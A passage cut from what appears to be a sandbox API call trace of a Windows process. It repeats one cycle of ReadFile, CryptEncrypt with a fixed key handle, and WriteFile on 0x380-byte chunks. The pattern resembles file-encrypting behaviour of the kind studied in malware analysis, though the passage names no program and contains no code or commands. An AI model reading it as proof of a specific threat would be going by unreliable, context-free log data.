pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.842] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.843] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.843] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.843] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.843] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.843] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.844] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.844] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.844] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.844] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.844] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.845] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.845] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.845] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.845] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.846] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.846] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.846] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.846] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.846] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.847] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.847] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.847] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.847] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.848] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.848] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.848] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.848] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.849] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.849] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.849] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.849] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.849] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.850] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.850] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.850] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.850] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: 